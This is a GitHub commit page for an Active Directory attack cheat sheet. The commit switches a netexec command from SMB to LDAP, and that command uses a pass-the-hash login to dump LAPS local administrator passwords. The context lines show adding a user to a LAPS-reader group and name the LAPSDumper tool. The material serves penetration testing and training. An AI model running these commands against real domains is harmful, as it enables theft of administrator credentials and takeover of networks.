Skip to content

Commit

Permalink
Merge pull request #23 from idealphase/main
Browse files Browse the repository at this point in the history
Update pwd-read-laps.md
  • Loading branch information
swisskyrepo authored Jan 29, 2025
2 parents 4078349 + 4a0ad04 commit 5288c9b
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions docs/active-directory/pwd-read-laps.md
Original file line number Diff line number Diff line change
Expand Up @@ -63,7 +63,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
* [netexec](https://github.com/Pennyw0rth/NetExec):
```bash
netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
netexec ldap 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
```
* [LAPSDumper](https://github.com/n00py/LAPSDumper)
Expand All @@ -90,4 +90,4 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -

## References

* [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)
* [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)

0 comments on commit 5288c9b

Please sign in to comment.